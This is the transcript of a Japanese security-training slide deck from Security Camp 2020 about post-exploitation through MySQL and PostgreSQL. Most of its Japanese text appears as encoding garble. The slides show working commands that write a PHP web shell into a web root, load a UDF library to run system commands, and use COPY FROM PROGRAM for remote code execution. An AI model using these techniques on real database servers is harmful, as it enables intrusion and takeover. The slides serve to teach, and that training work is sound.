Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Learn the essential way of thinking about vulne...

@tkmru
November 23, 2020

Learn the essential way of thinking about vulnerabilities through post-exploitation on middlewares (MySQL/PostgreSQL編)/seccamp2020-b8

セキュリティ・キャンプ全国大会2020オンライン Bトラックにて。
https://www.ipa.go.jp/jinzai/camp/2020/zenkoku2020_program_list.html#list_b8
本編: https://speakerdeck.com/knqyf263/seccamp2020-b8

@tkmru

November 23, 2020
Tweet

More Decks by @tkmru

Other Decks in Programming

Transcript

  1. ηΩϡϦςΟɾΩϟϯϓશࠃେձ2020ΦϯϥΠϯ Learn the essential way of thinking about vulnerabilities through

    post-exploitation on middlewares (MySQL/PostgreSQLฤ) Taichi Kotake (@tkmru) Teppei Fukuda (@knqyf263)
  2. ࣗݾ঺հ w ໊લɿ5BJDIJ,PUBLF !ULNSV  w ॴଐɿגࣜձࣾΞΧπΩ ɹɹɹηΩϡϦςΟΤϯδχΞ w ॴࡏ஍ɿ౦ژ

    w ஶॻ   w 8&# %#13&447PM ಛूπʔϧͰ؆୯ʂ͸͡Ίͯͷ੬ऑੑௐࠪʢٕज़ධ࿦ࣾʣ w ϦόʔεΤϯδχΞϦϯάπʔϧ(IJESB࣮ફΨΠυʢϚΠφϏग़൛ʣ
  3. ಡΈ͍͚ͨͲͳ͔ͳ͔ಡΊͳ͍ϑΝΠϧ w FUDTIBEPX w ϩάΠϯύεϫʔυͷϋογϡ͕ॻ͔Ε͍ͯΔ w ಡΈऔΓʹ͸؅ཧऀݖݶ͕ඞཁ w dTTIൿີ伴໊ w

    44)ͷൿີ伴 w ࢖༻࣌ʹDINPEΛઃఆ͞Ε͍ͯΔ w 44)Λ࢖͍ͬͯΔϢʔβݖݶPS؅ཧऀݖݶͰͳ͍ͱಡΊͳ͍ QPTUFYQMPJUBUJPOPOUIF%#TFSWFS
  4. %#ͷػೳΛ࢖ͬͯ3$&ʹ࣋ͪࠐΉํ๏ w .Z42- w 6%'&YQMPJUBUJPO w 1PTUHSFT%# w $01:50'30.130(3". w

    3FEJT w 3&1-*$"0' QPTUFYQMPJUBUJPOPOUIF%#TFSWFS ͜Ε͔Β%#ຖʹςΫχοΫΛ ղઆ͠·͢ʂʂʂ
  5. αʔό΁ϑΝΠϧΛΞοϓϩʔυ .Z42- w 4&-&$5*/50065'*-&ߏจʹΑͬͯॻ͖ࠐΈՄೳ mysql> select '<?php system($_GET["cmd"]);?>'
 -> into

    outfile '/var/www/html/shell.php'; mysql> select from_base64('c2VjY2FtcCB0cmFjayBiCg==') 
 -> into dumpfile "hoge.so"; w େ͖͍ϑΝΠϧΛΞοϓϩʔυ͍ͨ͠ͱ͖͸#BTFʹҰ౓ม׵͢Δ
  6. TFDVSF@GJMF@QSJWʹΑΔ੍ݶ w Ҏ߱Ͱ͸σϑΥϧτͰTFDVSF@pMF@QSJWʹద੾ͳύε͕ઃఆ͞Ε͍ͯΔ ͨΊɺ࠷ۙͰ͸೚ҙͷϑΝΠϧΛಡΈࠐΈॻ͖ࠐΈͰ͖Δϗετ͸গͳ͍ .Z42- mysql> show variables like "secure_file_priv";

    
 +------------------+-----------------------+
 | Variable_name | Value |
 +------------------+-----------------------+
 | secure_file_priv | /var/lib/mysql-files/ |
 +------------------+-----------------------+ 1 row in set (0.00 sec)
  7. .Z42-6%'&YQMPJUBUJPO 8IBUT6%' w 6%' 6TFS%FpOFE'VODUJPO ͸Ϣʔβ͕ࣗ༝ʹ.Z42-ʹؔ਺Λ௥Ճ͢Δͨ Ίͷػೳ w QMVHJOEJSʹࢦఆ͞Ε͍ͯΔσΟϨΫτϦʹ഑ஔͨ͠ڞ༗ϥΠϒϥϦ಺ͷؔ਺ Λɺ.Z42-ͷؔ਺ͱͯ͠࢖༻Ͱ͖Δ

    mysql> select @@plugin_dir;
 +------------------------+ | @@plugin_dir |
 +------------------------+ | /usr/lib/mysql/plugin/ |
 +------------------------+ 1 row in set (0.00 sec)
  8. .Z42-6%'&YQMPJUBUJPO 6%'Λొ࿥ mysql> select from_base64('f0VMRgIBAQAA<লུ>AAAA') into dumpfile "/usr/lib/mysql/ plugin/lib_mysqludf_sys_64.so"; Query

    OK, 1 row affected (0.01 sec)
 
 mysql> create function sys_eval returns string soname 'lib_mysqludf_sys_64.so'; Query OK, 0 rows affected (0.00 sec) -----------------------+ | @@plugin_dir |
 +------------------------+ | /usr/lib/mysql/plugin/ |
 +------------------------+ 1 row in set (0.00 sec) w MJC@NZTRMVEG@TZT@TPΛ#BTFʹม׵ͯ͠Ξοϓϩʔυ w $3&"5&'6/$5*0/ߏจͰϥΠϒϥϦ಺ͷؔ਺Λొ࿥
  9. .Z42-6%'&YQMPJUBUJPO 6%'Λ࣮ߦ w ొ࿥ͨؔ͠਺ʢTZT@FWBMʣΛ࣮ߦͰ͖Δʂ w JEίϚϯυΛ࣮ߦ͢Δྫ mysql> select convert(sys_eval('id') using

    utf8);
 +-------------------------------------------------+
 | convert(sys_eval('id') using utf8) |
 +-------------------------------------------------+
 | uid=999(mysql) gid=999(mysql) groups=999(mysql) |
 +-------------------------------------------------+
 1 row in set (0.01 sec)
  10. .Z42-6%'&YQMPJUBUJPOͷ໰୊఺ w TFDVSFpMFQSJWͷ͍ͤͰݱ୅Ͱ͸ࢗ͞Βͳ͍ɻɻɻ w QMVHJOEJSʹڞ༗ϥΠϒϥϦΛΞοϓϩʔυͰ͖ͳ͍ mysql> select from_base64('f0VMRgIBAQAA<লུ>AAAA') 
 ->

    into dumpfile "/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so"; ERROR 1290 (HY000): The MySQL server is running with the --secure- file-priv option so it cannot execute this statement
  11. αʔό΁ϑΝΠϧΛΞοϓϩʔυ 1PTUHSFT42- w $01:50ίϚϯυςʔϒϧ͔ΒϑΝΠϧ΁ͱσʔλΛ౉͢ w #BTFʹม׵͢Δ͜ͱͰେ͖͍ϑΝΠϧΛΞοϓϩʔυՄೳ postgres=# copy (select convert_from(


    postgres(# decode('c2VjY2FtcCB0cmFjayBiCg==','base64'),'utf-8'))
 postgres-# to '/tmp/hoge.so' postgres=# copy (select '<?php system($_GET["cmd"]);?>') 
 postgres-# to '/var/www/html/shell.php';
  12. w 1PTUHSF42-ͷެࣜ%PDLFSΠϝʔδΛىಈ͠ɺQTRMͰϩάΠϯ͠·͢ $ docker run --name postgres-camp -e POSTGRES_PASSWORD=<ύεϫʔυΛࢦఆ> -p

    127.0.0.1:5432:5432 -d postgres:13.1
 $ psql -U postgres -h localhost
 Password for user postgres: 
 psql (13.0, server 13.1 (Debian 13.1-1.pgdg100+1))
 Type "help" for help.
 
 postgres=# ࣮ࡍʹ΍ͬͯΈΔ (1/2) ؀ڥ४උ
  13. w JEίϚϯυΛ࣮ߦ͢Δྫ ࣮ࡍʹ΍ͬͯΈΔ (2/2) 3$& postgres=# create table cmd_exec(cmd_output text);


    CREATE TABLE postgres=# copy cmd_exec from program 'id';
 COPY 1 postgres=# select * from cmd_exec;
 cmd_output 
 ------------------------------------------------------------------------
 uid=999(postgres) gid=999(postgres) groups=999(postgres),101(ssl-cert)
 (1 row)